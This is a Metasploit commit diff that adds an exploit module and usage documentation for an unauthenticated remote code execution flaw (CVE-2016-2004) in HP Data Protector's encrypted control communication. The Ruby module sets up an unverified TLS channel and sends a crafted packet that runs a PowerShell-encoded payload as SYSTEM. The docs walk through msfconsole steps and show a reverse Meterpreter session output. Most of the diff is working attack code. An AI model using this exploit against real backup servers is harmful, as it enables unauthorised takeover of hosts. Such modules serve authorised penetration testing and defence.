Land #6929, Add HP Data Protector Encrypted Comms exploit

2016-06-06 22:45:53 -05:00 · 2016-06-06 22:45:53 -05:00 · b59d10d9c4
parent d3a13f4b0c d8d6ab3ae8
commit b59d10d9c4
2 changed files with 225 additions and 0 deletions
--- a/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
+++ b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
@ -0,0 +1,75 @@
+HP Data Protector is an automated backup and recovery software for single-server to enterprise
+environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
+and Linux operating systems.
+
+While the server is using Encrypted Control Communication, HP Data Protector allows a remote
+attacker to gain access without authentication, and gain arbitrary code execution under the
+context of SYSTEM.
+
+
+## Vulnerable Application
+
+HP Data Protector versions 7, 8, and 9 are known to be affected.
+
+hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
+
+## Verification Steps
+
+**Installing HP Data Protector**
+
+Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
+against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
+
+After setting up the domain controller, double-click on the HP Data Protector installer, and you
+should see this screen:
+
+![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
+
+Click on **Install Data Protector**. And then the installer should ask you which installation type:
+
+![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
+
+Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
+
+**Enabling Encrypted Communication**
+
+After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
+Data Protector GUI:
+
+![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
+
+Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
+right, click on that.
+
+![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
+
+Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
+sure that is checked. And then click **Apply**
+
+**Using hp_dataprotector_encrypted_comms**
+
+After the encrypted communication is enabled, you are ready to use
+hp_dataprotector_encrypted_comms. Here is what you do:
+
+1. Start msfconsole
+2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
+3. Do: ```set RHOST [IP ADDRESS]```
+4. Do: ```set PAYLOAD [PAYLOAD NAME]```
+5. Set other options as needed
+6. Do: ```exploit```, and you should receive a session like the following:
+
+```
+msf exploit(hp_dataprotector_encrypted_comms) > run
+
+[*] Started reverse TCP handler on 172.16.23.1:4444 
+[*] 172.16.23.173:5555 - Initiating connection
+[*] 172.16.23.173:5555 - Establishing encrypted channel
+[*] 172.16.23.173:5555 - Sending payload
+[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
+[*] Sending stage (957999 bytes) to 172.16.23.173
+[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
--- a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
+      'Description'    => %q{
+        This module exploits a well known remote code execution exploit after establishing encrypted
+        control communications with a Data Protector agent. This allows exploitation of Data
+        Protector agents that have been configured to only use encrypted control communications.
+
+        This exploit works by executing the payload with Microsoft PowerShell so will only work
+        against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows
+        Server 2008 R2.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jon Barg',    # Reported vuln (originally discovery?) credited by HP
+          'Ian Lovering' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-2004' ],
+          [ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30,
+          'RPORT' => 5555
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 18 2016",
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    # For the check command
+    connect
+    sock.put(rand_text_alpha_upper(64))
+    response = sock.get_once(-1)
+    disconnect
+
+    if response.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    service_version = Rex::Text.to_ascii(response).chop.chomp
+
+    if service_version =~ /HP Data Protector/
+      vprint_status(service_version)
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+
+  end
+
+  def generate_dp_payload
+    command = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      { remove_comspec: true, encode_final_payload: true })
+
+    payload =
+      "\x32\x00\x01\x01\x01\x01\x01\x01" +
+      "\x00\x01\x00\x01\x00\x01\x00\x01" +
+      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
+      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
+      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
+      "\x6d('#{command}')\x00"
+
+    payload_length = [payload.length].pack('N')
+
+    return payload_length + payload
+  end
+
+  def exploit
+    # Main function
+    encryption_init_data =
+      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
+      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
+      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
+      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
+      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
+
+    print_status("Initiating connection")
+
+    # Open connection
+    connect
+
+    # Send init data
+    sock.put(encryption_init_data)
+    begin
+      buf = sock.get_once
+    rescue ::EOFError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    print_status("Establishing encrypted channel")
+
+    # Create TLS / SSL context
+    sock.extend(Rex::Socket::SslTcp)
+    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    sock.sslctx.options = OpenSSL::SSL::OP_ALL
+
+    # Enable all ciphers as older versions of Data Protector only use
+    # some not enabled by default
+    sock.sslctx.ciphers = "ALL"
+
+    # Enable TLS / SSL
+    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+    sock.sslsock.connect
+
+    print_status("Sending payload")
+
+    # Send payload
+    sock.put(generate_dp_payload(), {timeout: 5})
+
+    # Close socket
+    disconnect
+
+    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
+  end
+
+end
+